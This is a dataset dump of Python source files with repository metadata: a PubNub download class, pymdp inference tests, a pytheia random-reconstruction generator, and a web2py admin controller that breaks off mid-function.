hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a142bf75bc571805522d549393df6f64c2e7204
| 930
|
py
|
Python
|
blockchain-env/Lib/site-packages/pubnub/endpoints/file_operations/download_file_asyncio.py
|
zarif007/Block-Chain-Web-App
|
40bd4d8d8ce1f6de2840792290bf022d7dfacbb4
|
[
"MIT"
] | 1
|
2020-12-30T09:30:23.000Z
|
2020-12-30T09:30:23.000Z
|
blockchain-env/Lib/site-packages/pubnub/endpoints/file_operations/download_file_asyncio.py
|
zarif007/Block-Chain-Web-App
|
40bd4d8d8ce1f6de2840792290bf022d7dfacbb4
|
[
"MIT"
] | null | null | null |
blockchain-env/Lib/site-packages/pubnub/endpoints/file_operations/download_file_asyncio.py
|
zarif007/Block-Chain-Web-App
|
40bd4d8d8ce1f6de2840792290bf022d7dfacbb4
|
[
"MIT"
] | null | null | null |
from pubnub.models.consumer.file import PNDownloadFileResult
from pubnub.endpoints.file_operations.download_file import DownloadFileNative
from pubnub.endpoints.file_operations.get_file_url import GetFileDownloadUrl
class DownloadFileAsyncio(DownloadFileNative):
def create_response(self, envelope, data=None):
if self._cipher_key or self._pubnub.config.cipher_key:
data = self.decrypt_payload(data)
return PNDownloadFileResult(data)
def future(self):
self._download_data = yield from GetFileDownloadUrl(self._pubnub)\
.channel(self._channel)\
.file_name(self._file_name)\
.file_id(self._file_id)\
.future()
downloaded_file = yield from super(DownloadFileAsyncio, self).future()
return downloaded_file
def result(self):
response_envelope = yield from self.future()
return response_envelope.result
| 37.2
| 78
| 0.721505
|
4a142c3693d1dbdc3f6cd84d39e3af568bf79552
| 163
|
py
|
Python
|
__tests__/fixtures/mysetup.py
|
vemel/nextversion
|
e09d78ca62b720004d7cf489288ac88e17cbb0cc
|
[
"MIT"
] | 2
|
2021-03-22T17:48:22.000Z
|
2021-03-23T10:46:48.000Z
|
__tests__/fixtures/mysetup.py
|
vemel/nextversion
|
e09d78ca62b720004d7cf489288ac88e17cbb0cc
|
[
"MIT"
] | 2
|
2021-03-24T23:35:55.000Z
|
2022-01-02T17:22:40.000Z
|
__tests__/fixtures/mysetup.py
|
vemel/nextversion
|
e09d78ca62b720004d7cf489288ac88e17cbb0cc
|
[
"MIT"
] | 1
|
2021-07-26T20:52:08.000Z
|
2021-07-26T20:52:08.000Z
|
from setuptools import setup
if __name__ == '__main__':
setup(
name='mypackage',
version='2.3.4a5',
description='My description'
)
| 20.375
| 36
| 0.595092
|
4a142d9b59dd08279a5e3af3dddd287df434f5f7
| 594
|
py
|
Python
|
molsysmt/item/nglview_NGLWidget/to_string_aminoacids3.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
molsysmt/item/nglview_NGLWidget/to_string_aminoacids3.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
molsysmt/item/nglview_NGLWidget/to_string_aminoacids3.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
from molsysmt._private.exceptions import *
from molsysmt._private.digestion import *
def to_string_aminoacids3(item, atom_indices='all', check=True):
if check:
digest_item(item, 'nglview.NGLWidget')
atom_indices = digest_atom_indices(atom_indices)
from . import to_molsysmt_Topology
from ..molsysmt_Topology import to_string_aminoacids3 as molsysmt_Topology_to_string_aminoacids3
tmp_item = to_molsysmt_Topology(item, atom_indices=atom_indices, check=False)
tmp_item = molsysmt_Topolgy_to_string_aminoacids3(tmp_item, check=False)
return tmp_item
| 31.263158
| 100
| 0.786195
|
4a142e07503c47bc1e5332b062162dc9453b4c78
| 3,948
|
py
|
Python
|
test/test_inference.py
|
infer-actively/pymdp
|
4775054b0db53ec3f10b0b95eb6e78cc52f3588f
|
[
"MIT"
] | 108
|
2020-12-08T06:45:28.000Z
|
2022-03-30T12:32:59.000Z
|
test/test_inference.py
|
infer-actively/pymdp
|
4775054b0db53ec3f10b0b95eb6e78cc52f3588f
|
[
"MIT"
] | 16
|
2021-01-17T14:32:17.000Z
|
2022-03-13T16:39:00.000Z
|
test/test_inference.py
|
infer-actively/pymdp
|
4775054b0db53ec3f10b0b95eb6e78cc52f3588f
|
[
"MIT"
] | 17
|
2021-01-01T15:02:47.000Z
|
2022-03-19T05:08:45.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Unit Tests
__author__: Conor Heins, Alexander Tschantz, Daphne Demekas, Brennan Klein
"""
import os
import unittest
import numpy as np
from pymdp import utils, maths
from pymdp import inference
class TestInference(unittest.TestCase):
def test_update_posterior_states(self):
"""
Tests the refactored version of `update_posterior_states`
"""
'''Test with single hidden state factor and single observation modality'''
num_states = [3]
num_obs = [3]
prior = utils.random_single_categorical(num_states)
A = utils.to_arr_of_arr(maths.softmax(np.eye(num_states[0]) * 0.1))
obs_idx = 1
obs = utils.onehot(obs_idx, num_obs[0])
qs_out = inference.update_posterior_states(A, obs, prior=prior)
qs_validation = maths.softmax(maths.spm_log_single(A[0][obs_idx,:]) + maths.spm_log_single(prior[0]))
self.assertTrue(np.isclose(qs_validation, qs_out[0]).all())
'''Try single modality inference where the observation is passed in as an int'''
qs_out_2 = inference.update_posterior_states(A, obs_idx, prior=prior)
self.assertTrue(np.isclose(qs_out_2[0], qs_out[0]).all())
'''Try single modality inference where the observation is a one-hot stored in an object array'''
qs_out_3 = inference.update_posterior_states(A, utils.to_arr_of_arr(obs), prior=prior)
self.assertTrue(np.isclose(qs_out_3[0], qs_out[0]).all())
'''Test with multiple hidden state factors and single observation modality'''
num_states = [3, 4]
num_obs = [3]
prior = utils.random_single_categorical(num_states)
A = utils.random_A_matrix(num_obs, num_states)
obs_idx = 1
obs = utils.onehot(obs_idx, num_obs[0])
qs_out = inference.update_posterior_states(A, obs, prior=prior, num_iter = 1)
# validate with a quick n' dirty implementation of FPI
# initialize posterior and log prior
qs_valid_init = utils.obj_array_uniform(num_states)
log_prior = maths.spm_log_obj_array(prior)
qs_valid_final = utils.obj_array(len(num_states))
log_likelihood = maths.spm_log_single(maths.get_joint_likelihood(A, obs, num_states))
num_factors = len(num_states)
qs_valid_init_all = qs_valid_init[0]
for factor in range(num_factors-1):
qs_valid_init_all = qs_valid_init_all[...,None]*qs_valid_init[factor+1]
LL_tensor = log_likelihood * qs_valid_init_all
factor_ids = range(num_factors)
for factor, qs_f in enumerate(qs_valid_init):
ax2sum = tuple(set(factor_ids) - set([factor])) # which axes to sum out
qL = LL_tensor.sum(axis = ax2sum) / qs_f
qs_valid_final[factor] = maths.softmax(qL + log_prior[factor])
for factor, qs_f_valid in enumerate(qs_valid_final):
self.assertTrue(np.isclose(qs_f_valid, qs_out[factor]).all())
'''Test with multiple hidden state factors and multiple observation modalities, for two different kinds of observation input formats'''
num_states = [3, 4]
num_obs = [3, 3, 5]
prior = utils.random_single_categorical(num_states)
A = utils.random_A_matrix(num_obs, num_states)
obs_index_tuple = tuple([np.random.randint(obs_dim) for obs_dim in num_obs])
qs_out1 = inference.update_posterior_states(A, obs_index_tuple, prior=prior)
obs_onehots = utils.obj_array(len(num_obs))
for g in range(len(num_obs)):
obs_onehots[g] = utils.onehot(obs_index_tuple[g], num_obs[g])
qs_out2 = inference.update_posterior_states(A, obs_onehots, prior=prior)
for factor in range(len(num_states)):
self.assertTrue(np.isclose(qs_out1[factor], qs_out2[factor]).all())
if __name__ == "__main__":
unittest.main()
| 34.631579
| 143
| 0.670466
|
4a142e3aa7d6455631311f4fe21b7d271d711368
| 5,819
|
py
|
Python
|
pytest/random_recon_gen.py
|
Sergej91/TheiaSfM
|
e603e16888456c3e565a2c197fa9f8643c176175
|
[
"BSD-3-Clause"
] | null | null | null |
pytest/random_recon_gen.py
|
Sergej91/TheiaSfM
|
e603e16888456c3e565a2c197fa9f8643c176175
|
[
"BSD-3-Clause"
] | null | null | null |
pytest/random_recon_gen.py
|
Sergej91/TheiaSfM
|
e603e16888456c3e565a2c197fa9f8643c176175
|
[
"BSD-3-Clause"
] | null | null | null |
import pytheia as pt
from scipy.spatial.transform import Rotation as R
import numpy as np
class RandomReconGenerator:
def __init__(self, seed=42, verbose=False):
self.seed = seed
np.random.seed(self.seed)
self.recon = pt.sfm.Reconstruction()
self.nr_views = 0
self.camera = pt.sfm.Camera()
self.camera.FocalLength = 500
self.camera.SetPrincipalPoint(500,500)
self.camera.SetImageSize(1000,1000)
self.verbose = verbose
def _sample_views(self, nr_views,
xyz_min=[0,0,0], xyz_max=[2,2,2],
rot_ax_min=[-0.1,-0.1,-0.1],
rot_ax_max=[0.1,0.1,0.1],max_rot_angle=np.pi/4):
if self.verbose:
print("Sampling {} views".format(nr_views))
self.nr_cams = nr_views
X = np.random.uniform(low=xyz_min[0], high=xyz_max[0], size=(nr_views,))
Y = np.random.uniform(low=xyz_min[1], high=xyz_max[1], size=(nr_views,))
Z = np.random.uniform(low=xyz_min[2], high=xyz_max[2], size=(nr_views,))
RX = np.random.uniform(low=rot_ax_min[0], high=rot_ax_max[0], size=(nr_views,))
RY = np.random.uniform(low=rot_ax_min[1], high=rot_ax_max[1], size=(nr_views,))
RZ = np.random.uniform(low=rot_ax_min[2], high=rot_ax_max[2], size=(nr_views,))
angles = np.random.uniform(low=-max_rot_angle, high=max_rot_angle, size=(nr_views,))
for i in range(self.nr_cams):
view_id = self.recon.AddView(str(i),0,i)
view = self.recon.View(view_id)
m_cam = view.MutableCamera()
m_cam.DeepCopy(self.camera)
m_cam.Position = np.array([X[i],Y[i],Z[i]])
m_cam.SetOrientationFromAngleAxis(angles[i] * np.array([RX[i], RY[i], RZ[i]]))
view.IsEstimated = True
def _sample_tracks(self, nr_tracks, xyz_min=[-2,-2,-2], xyz_max=[2,2,2]):
if self.verbose:
print("Sampling {} tracks".format(nr_tracks))
self.nr_tracks = nr_tracks
X = np.random.uniform(low=xyz_min[0], high=xyz_max[0], size=(nr_tracks,))
Y = np.random.uniform(low=xyz_min[1], high=xyz_max[1], size=(nr_tracks,))
Z = np.random.uniform(low=xyz_min[2], high=xyz_max[2], size=(nr_tracks,))
for i in range(self.nr_tracks):
track_id = self.recon.AddTrack()
point = np.array([X[i],Y[i],Z[i],1],dtype=np.float32)
track = self.recon.MutableTrack(track_id)
track.Point = point
track.IsEstimated = True
#def _project_points_to_views(self):
def generate_random_recon(self,
nr_views = 10,
nr_tracks = 100,
pt3_xyz_min = [-4,-4,-1],
pt3_xyz_max = [4, 4, 6],
cam_xyz_min = [-6, -6,-2],
cam_xyz_max = [6, 6,-6],
cam_rot_ax_min = [-0.1,-0.1,-0.1],
cam_rot_ax_max = [0.1,0.1,0.1],
cam_rot_max_angle = np.pi/4,
pixel_noise = 0.0):
self._sample_tracks(nr_tracks, pt3_xyz_min, pt3_xyz_max)
self._sample_views(nr_views, cam_xyz_min, cam_xyz_max,
cam_rot_ax_min, cam_rot_ax_max, cam_rot_max_angle)
self._create_observations(pixel_noise=pixel_noise)
return self.recon
def _create_observations(self, pixel_noise = 0.0):
for tid in self.recon.TrackIds:
track = self.recon.Track(tid).Point
for vid in self.recon.ViewIds:
view = self.recon.View(vid)
cam = view.Camera()
obs = cam.ProjectPoint(track)
if obs[0] <= 0:
continue
point2d = obs[1] + np.random.randn(2) * pixel_noise
if self.verbose:
print("Adding observation: track {} in view {} projection {}".format(tid, vid, point2d))
self.recon.AddObservation(vid, tid, pt.sfm.Feature(point2d))
def add_view(self, view_pos, view_ax_angle, view_name=""):
num_views = len(self.recon.ViewIds)
view_id = self.recon.AddView(view_name, 0, num_views+1)
if self.verbose:
print("Adding view {}".format(view_id))
view = self.recon.View(view_id)
view.MutableCamera().Position = np.array(view_pos)
view.MutableCamera().SetOrientationFromAngleAxis(view_ax_angle)
view.IsEstimated = True
def add_track(self, track_xyz):
track_id = self.recon.AddTrack()
if self.verbose:
print("Adding track {}".format(track_id))
track = self.recon.MutableTrack(track_id)
track.Point = np.array([track_xyz[0],track_xyz[1],track_xyz[2],1],dtype=np.float32)
track.IsEstimated = True
def add_noise_to_view(self, view_id, noise_pos, noise_angle):
view = self.recon.View(view_id)
view.MutableCamera().Position = view.MutableCamera().Position + noise_pos*np.random.randn(3)
ax_angle = view.Camera().GetOrientationAsAngleAxis()
noise_angle_rad = noise_angle * np.pi / 180.
view.MutableCamera().SetOrientationFromAngleAxis(ax_angle + noise_angle_rad*np.random.randn(3))
def add_noise_to_views(self, noise_pos=1e-5, noise_angle=1e-2):
for view_id in self.recon.ViewIds:
self.add_noise_to_view(view_id, noise_pos, noise_angle)
if __name__ == "__main__":
gen = RandomReconGenerator(seed=42, verbose=True)
gen.generate_random_recon()
for i in range(10):
gen.add_track([i*i,i,i+i])
for i in range(10):
gen.add_view(view_pos=[0,i,0], view_ax_angle=[i,0,0], view_name="ii"+str(i))
| 42.166667
| 108
| 0.585668
|
4a142f2249f00547f3d9628abf93c9eac1a0dcf8
| 74,928
|
py
|
Python
|
applications/admin/controllers/default.py
|
jessicadelrio/HandyHouse
|
058e8981da850790c84f990fd2a3bbcf9aa695cc
|
[
"BSD-3-Clause"
] | 2
|
2018-12-08T23:59:12.000Z
|
2019-02-13T23:04:36.000Z
|
applications/admin/controllers/default.py
|
jessicadelrio/HandyHouse
|
058e8981da850790c84f990fd2a3bbcf9aa695cc
|
[
"BSD-3-Clause"
] | null | null | null |
applications/admin/controllers/default.py
|
jessicadelrio/HandyHouse
|
058e8981da850790c84f990fd2a3bbcf9aa695cc
|
[
"BSD-3-Clause"
] | 3
|
2018-12-08T23:59:17.000Z
|
2019-02-13T23:04:38.000Z
|
# -*- coding: utf-8 -*-
EXPERIMENTAL_STUFF = True
MAXNFILES = 1000
if EXPERIMENTAL_STUFF:
if is_mobile:
response.view = response.view.replace('default/', 'default.mobile/')
response.menu = []
import re
from gluon.admin import *
from gluon.fileutils import abspath, read_file, write_file
from gluon.utils import web2py_uuid
from gluon.tools import Config
from gluon.compileapp import find_exposed_functions
from glob import glob
from gluon._compat import iteritems, PY2, pickle, xrange, urlopen, to_bytes, StringIO, to_native
import gluon.rewrite
import shutil
import platform
try:
import git
if git.__version__ < '0.3.1':
raise ImportError("Your version of git is %s. Upgrade to 0.3.1 or better." % git.__version__)
have_git = True
except ImportError as e:
have_git = False
GIT_MISSING = 'Requires gitpython module, but not installed or incompatible version: %s' % e
from gluon.languages import (read_possible_languages, read_dict, write_dict,
read_plural_dict, write_plural_dict)
if DEMO_MODE and request.function in ['change_password', 'pack',
'pack_custom', 'pack_plugin', 'upgrade_web2py', 'uninstall',
'cleanup', 'compile_app', 'remove_compiled_app', 'delete',
'delete_plugin', 'create_file', 'upload_file', 'update_languages',
'reload_routes', 'git_push', 'git_pull', 'install_plugin']:
session.flash = T('disabled in demo mode')
redirect(URL('site'))
if is_gae and request.function in ('edit', 'edit_language',
'edit_plurals', 'update_languages', 'create_file', 'install_plugin'):
session.flash = T('disabled in GAE mode')
redirect(URL('site'))
if not is_manager() and request.function in ['change_password', 'upgrade_web2py']:
session.flash = T('disabled in multi user mode')
redirect(URL('site'))
if FILTER_APPS and request.args(0) and not request.args(0) in FILTER_APPS:
session.flash = T('disabled in demo mode')
redirect(URL('site'))
if not session.token:
session.token = web2py_uuid()
def count_lines(data):
return len([line for line in data.split('\n') if line.strip() and not line.startswith('#')])
def log_progress(app, mode='EDIT', filename=None, progress=0):
progress_file = os.path.join(apath(app, r=request), 'progress.log')
now = str(request.now)[:19]
if not os.path.exists(progress_file):
safe_open(progress_file, 'w').write('[%s] START\n' % now)
if filename:
safe_open(progress_file, 'a').write(
'[%s] %s %s: %s\n' % (now, mode, filename, progress))
def safe_open(a, b):
if (DEMO_MODE or is_gae) and ('w' in b or 'a' in b):
class tmp:
def write(self, data):
pass
def close(self):
pass
return tmp()
if PY2 or 'b' in b:
return open(a, b)
else:
return open(a, b, encoding="utf8")
def safe_read(a, b='r'):
safe_file = safe_open(a, b)
try:
return safe_file.read()
finally:
safe_file.close()
def safe_write(a, value, b='w'):
safe_file = safe_open(a, b)
try:
safe_file.write(value)
finally:
safe_file.close()
def get_app(name=None):
app = name or request.args(0)
if (app and os.path.exists(apath(app, r=request)) and
(not MULTI_USER_MODE or is_manager() or
db(db.app.name == app)(db.app.owner == auth.user.id).count())):
return app
session.flash = T('App does not exist or you are not authorized')
redirect(URL('site'))
def index():
""" Index handler """
send = request.vars.send
if DEMO_MODE:
session.authorized = True
session.last_time = t0
if not send:
send = URL('site')
if session.authorized:
redirect(send)
elif failed_login_count() >= allowed_number_of_attempts:
time.sleep(2 ** allowed_number_of_attempts)
raise HTTP(403)
elif request.vars.password:
if verify_password(request.vars.password[:1024]):
session.authorized = True
login_record(True)
if CHECK_VERSION:
session.check_version = True
else:
session.check_version = False
session.last_time = t0
if isinstance(send, list): # ## why does this happen?
send = str(send[0])
redirect(send)
else:
times_denied = login_record(False)
if times_denied >= allowed_number_of_attempts:
response.flash = \
T('admin disabled because too many invalid login attempts')
elif times_denied == allowed_number_of_attempts - 1:
response.flash = \
T('You have one more login attempt before you are locked out')
else:
response.flash = T('invalid password.')
return dict(send=send)
def check_version():
""" Checks if web2py is up to date """
session.forget()
session._unlock(response)
new_version, version = check_new_version(request.env.web2py_version,
WEB2PY_VERSION_URL)
if new_version == -1:
return A(T('Unable to check for upgrades'), _href=WEB2PY_URL)
elif new_version != True:
return A(T('web2py is up to date'), _href=WEB2PY_URL)
elif platform.system().lower() in ('windows', 'win32', 'win64') and os.path.exists("web2py.exe"):
return SPAN('You should upgrade to %s' % version.split('(')[0])
else:
return sp_button(URL('upgrade_web2py'), T('upgrade now to %s') % version.split('(')[0])
def logout():
""" Logout handler """
session.authorized = None
if MULTI_USER_MODE:
redirect(URL('user/logout'))
redirect(URL('index'))
def change_password():
if session.pam_user:
session.flash = T(
'PAM authenticated user, cannot change password here')
redirect(URL('site'))
form = SQLFORM.factory(Field('current_admin_password', 'password'),
Field('new_admin_password',
'password', requires=IS_STRONG()),
Field('new_admin_password_again', 'password'),
_class="span4 well")
if form.accepts(request.vars):
if not verify_password(request.vars.current_admin_password):
form.errors.current_admin_password = T('invalid password')
elif form.vars.new_admin_password != form.vars.new_admin_password_again:
form.errors.new_admin_password_again = T('no match')
else:
path = abspath('parameters_%s.py' % request.env.server_port)
safe_write(path, 'password="%s"' % CRYPT()(
request.vars.new_admin_password)[0])
session.flash = T('password changed')
redirect(URL('site'))
return dict(form=form)
def site():
""" Site handler """
myversion = request.env.web2py_version
# Shortcut to make the elif statements more legible
file_or_appurl = 'file' in request.vars or 'appurl' in request.vars
class IS_VALID_APPNAME(object):
def __call__(self, value):
if not re.compile('^\w+$').match(value):
return (value, T('Invalid application name'))
if not request.vars.overwrite and \
os.path.exists(os.path.join(apath(r=request), value)):
return (value, T('Application exists already'))
return (value, None)
is_appname = IS_VALID_APPNAME()
form_create = SQLFORM.factory(Field('name', requires=is_appname),
table_name='appcreate')
form_update = SQLFORM.factory(Field('name', requires=is_appname),
Field('file', 'upload', uploadfield=False),
Field('url'),
Field('overwrite', 'boolean'),
table_name='appupdate')
form_create.process()
form_update.process()
if DEMO_MODE:
pass
elif form_create.accepted:
# create a new application
appname = cleanpath(form_create.vars.name)
created, error = app_create(appname, request, info=True)
if created:
if MULTI_USER_MODE:
db.app.insert(name=appname, owner=auth.user.id)
log_progress(appname)
session.flash = T('new application "%s" created', appname)
gluon.rewrite.load()
redirect(URL('design', args=appname))
else:
session.flash = \
DIV(T('unable to create application "%s"', appname),
PRE(error))
redirect(URL(r=request))
elif form_update.accepted:
if (form_update.vars.url or '').endswith('.git'):
if not have_git:
session.flash = GIT_MISSING
redirect(URL(r=request))
target = os.path.join(apath(r=request), form_update.vars.name)
try:
new_repo = git.Repo.clone_from(form_update.vars.url, target)
session.flash = T('new application "%s" imported',
form_update.vars.name)
gluon.rewrite.load()
except git.GitCommandError as err:
session.flash = T('Invalid git repository specified.')
redirect(URL(r=request))
elif form_update.vars.url:
# fetch an application via URL or file upload
try:
f = urlopen(form_update.vars.url)
if f.code == 404:
raise Exception("404 file not found")
except Exception as e:
session.flash = \
DIV(T('Unable to download app because:'), PRE(repr(e)))
redirect(URL(r=request))
fname = form_update.vars.url
elif form_update.accepted and form_update.vars.file:
fname = request.vars.file.filename
f = request.vars.file.file
else:
session.flash = 'No file uploaded and no URL specified'
redirect(URL(r=request))
if f:
appname = cleanpath(form_update.vars.name)
installed = app_install(appname, f,
request, fname,
overwrite=form_update.vars.overwrite)
if f and installed:
msg = 'application %(appname)s installed with md5sum: %(digest)s'
if MULTI_USER_MODE:
db.app.insert(name=appname, owner=auth.user.id)
log_progress(appname)
session.flash = T(msg, dict(appname=appname,
digest=md5_hash(installed)))
gluon.rewrite.load()
else:
msg = 'unable to install application "%(appname)s"'
session.flash = T(msg, dict(appname=form_update.vars.name))
redirect(URL(r=request))
regex = re.compile('^\w+$')
if is_manager():
apps = [a for a in os.listdir(apath(r=request)) if regex.match(a) and
a != '__pycache__']
else:
apps = [a.name for a in db(db.app.owner == auth.user_id).select()]
if FILTER_APPS:
apps = [a for a in apps if a in FILTER_APPS]
apps = sorted(apps, key=lambda a: a.upper())
myplatform = platform.python_version()
return dict(app=None, apps=apps, myversion=myversion, myplatform=myplatform,
form_create=form_create, form_update=form_update)
def report_progress(app):
import datetime
progress_file = os.path.join(apath(app, r=request), 'progress.log')
regex = re.compile('\[(.*?)\][^\:]+\:\s+(\-?\d+)')
if not os.path.exists(progress_file):
return []
matches = regex.findall(open(progress_file, 'r').read())
events, counter = [], 0
for m in matches:
if not m:
continue
days = -(request.now - datetime.datetime.strptime(m[0],
'%Y-%m-%d %H:%M:%S')).days
counter += int(m[1])
events.append([days, counter])
return events
def pack():
app = get_app()
try:
if len(request.args) == 1:
fname = 'web2py.app.%s.w2p' % app
filename = app_pack(app, request, raise_ex=True)
else:
fname = 'web2py.app.%s.compiled.w2p' % app
filename = app_pack_compiled(app, request, raise_ex=True)
except Exception as e:
filename = None
if filename:
response.headers['Content-Type'] = 'application/w2p'
disposition = 'attachment; filename=%s' % fname
response.headers['Content-Disposition'] = disposition
return safe_read(filename, 'rb')
else:
session.flash = T('internal error: %s', e)
redirect(URL('site'))
def pack_plugin():
app = get_app()
if len(request.args) == 2:
fname = 'web2py.plugin.%s.w2p' % request.args[1]
filename = plugin_pack(app, request.args[1], request)
if filename:
response.headers['Content-Type'] = 'application/w2p'
disposition = 'attachment; filename=%s' % fname
response.headers['Content-Disposition'] = disposition
return safe_read(filename, 'rb')
else:
session.flash = T('internal error')
redirect(URL('plugin', args=request.args))
def pack_exe(app, base, filenames=None):
import urllib
import zipfile
# Download latest web2py_win and open it with zipfile
download_url = 'http://www.web2py.com/examples/static/web2py_win.zip'
out = StringIO()
out.write(urlopen(download_url).read())
web2py_win = zipfile.ZipFile(out, mode='a')
# Write routes.py with the application as default
routes = u'# -*- coding: utf-8 -*-\nrouters = dict(BASE=dict(default_application="%s"))' % app
web2py_win.writestr('web2py/routes.py', routes.encode('utf-8'))
# Copy the application into the zipfile
common_root = os.path.dirname(base)
for filename in filenames:
fname = os.path.join(base, filename)
arcname = os.path.join('web2py/applications', app, filename)
web2py_win.write(fname, arcname)
web2py_win.close()
response.headers['Content-Type'] = 'application/zip'
response.headers['Content-Disposition'] = 'attachment; filename=web2py.app.%s.zip' % app
out.seek(0)
return response.stream(out)
def pack_custom():
app = get_app()
base = apath(app, r=request)
def ignore(fs):
return [f for f in fs if not (
f[:1] in '#' or f.endswith('~') or f.endswith('.bak'))]
files = {}
for (r, d, f) in os.walk(base):
files[r] = {'folders': ignore(d), 'files': ignore(f)}
if request.post_vars.file:
valid_set = set(os.path.relpath(os.path.join(r, f), base) for r in files for f in files[r]['files'])
files = request.post_vars.file
files = [files] if not isinstance(files, list) else files
files = [file for file in files if file in valid_set]
if request.post_vars.doexe is None:
fname = 'web2py.app.%s.w2p' % app
try:
filename = app_pack(app, request, raise_ex=True, filenames=files)
except Exception as e:
filename = None
if filename:
response.headers['Content-Type'] = 'application/w2p'
disposition = 'attachment; filename=%s' % fname
response.headers['Content-Disposition'] = disposition
return safe_read(filename, 'rb')
else:
session.flash = T('internal error: %s', e)
redirect(URL(args=request.args))
else:
return pack_exe(app, base, files)
return locals()
def upgrade_web2py():
dialog = FORM.confirm(T('Upgrade'),
{T('Cancel'): URL('site')})
if dialog.accepted:
(success, error) = upgrade(request)
if success:
session.flash = T('web2py upgraded; please restart it')
else:
session.flash = T('unable to upgrade because "%s"', error)
redirect(URL('site'))
return dict(dialog=dialog)
def uninstall():
app = get_app()
dialog = FORM.confirm(T('Uninstall'),
{T('Cancel'): URL('site')})
dialog['_id'] = 'confirm_form'
dialog['_class'] = 'well'
for component in dialog.components:
component['_class'] = 'btn'
if dialog.accepted:
if MULTI_USER_MODE:
if is_manager() and db(db.app.name == app).delete():
pass
elif db(db.app.name == app)(db.app.owner == auth.user.id).delete():
pass
else:
session.flash = T('no permission to uninstall "%s"', app)
redirect(URL('site'))
try:
filename = app_pack(app, request, raise_ex=True)
except:
session.flash = T('unable to uninstall "%s"', app)
else:
if app_uninstall(app, request):
session.flash = T('application "%s" uninstalled', app)
else:
session.flash = T('unable to uninstall "%s"', app)
redirect(URL('site'))
return dict(app=app, dialog=dialog)
def cleanup():
app = get_app()
clean = app_cleanup(app, request)
if not clean:
session.flash = T("some files could not be removed")
else:
session.flash = T('cache, errors and sessions cleaned')
redirect(URL('site'))
def compile_app():
app = get_app()
c = app_compile(app, request,
skip_failed_views=(request.args(1) == 'skip_failed_views'))
if not c:
session.flash = T('application compiled')
elif isinstance(c, list):
session.flash = DIV(*[T('application compiled'), BR(), BR(),
T('WARNING: The following views could not be compiled:'), BR()] +
[CAT(BR(), view) for view in c] +
[BR(), BR(), T('DO NOT use the "Pack compiled" feature.')])
else:
session.flash = DIV(T('Cannot compile: there are errors in your app:'),
CODE(c))
redirect(URL('site'))
def remove_compiled_app():
""" Remove the compiled application """
app = get_app()
remove_compiled_application(apath(app, r=request))
session.flash = T('compiled application removed')
redirect(URL('site'))
def delete():
""" Object delete handler """
app = get_app()
filename = '/'.join(request.args)
sender = request.vars.sender
if isinstance(sender, list): # ## fix a problem with Vista
sender = sender[0]
dialog = FORM.confirm(T('Delete'),
{T('Cancel'): URL(sender, anchor=request.vars.id)})
if dialog.accepted:
try:
full_path = apath(filename, r=request)
lineno = count_lines(open(full_path, 'r').read())
os.unlink(full_path)
log_progress(app, 'DELETE', filename, progress=-lineno)
session.flash = T('file "%(filename)s" deleted',
dict(filename=filename))
except Exception:
session.flash = T('unable to delete file "%(filename)s"',
dict(filename=filename))
redirect(URL(sender, anchor=request.vars.id2))
return dict(dialog=dialog, filename=filename)
def enable():
if not URL.verify(request, hmac_key=session.hmac_key): raise HTTP(401)
app = get_app()
filename = os.path.join(apath(app, r=request), 'DISABLED')
if is_gae:
return SPAN(T('Not supported'), _style='color:yellow')
elif os.path.exists(filename):
os.unlink(filename)
return SPAN(T('Disable'), _style='color:green')
else:
if PY2:
safe_open(filename, 'wb').write('disabled: True\ntime-disabled: %s' % request.now)
else:
str_ = 'disabled: True\ntime-disabled: %s' % request.now
safe_open(filename, 'wb').write(str_.encode('utf-8'))
return SPAN(T('Enable'), _style='color:red')
def peek():
""" Visualize object code """
app = get_app(request.vars.app)
filename = '/'.join(request.args)
if request.vars.app:
path = abspath(filename)
else:
path = apath(filename, r=request)
try:
data = safe_read(path).replace('\r', '')
except IOError:
session.flash = T('file does not exist')
redirect(URL('site'))
extension = filename[filename.rfind('.') + 1:].lower()
return dict(app=app,
filename=filename,
data=data,
extension=extension)
def test():
""" Execute controller tests """
app = get_app()
if len(request.args) > 1:
file = request.args[1]
else:
file = '.*\.py'
controllers = listdir(
apath('%s/controllers/' % app, r=request), file + '$')
return dict(app=app, controllers=controllers)
def keepalive():
return ''
def search():
keywords = request.vars.keywords or ''
app = get_app()
def match(filename, keywords):
filename = os.path.join(apath(app, r=request), filename)
if keywords in read_file(filename, 'rb'):
return True
return False
path = apath(request.args[0], r=request)
files1 = glob(os.path.join(path, '*/*.py'))
files2 = glob(os.path.join(path, '*/*.html'))
files3 = glob(os.path.join(path, '*/*/*.html'))
files = [x[len(path) + 1:].replace(
'\\', '/') for x in files1 + files2 + files3 if match(x, keywords)]
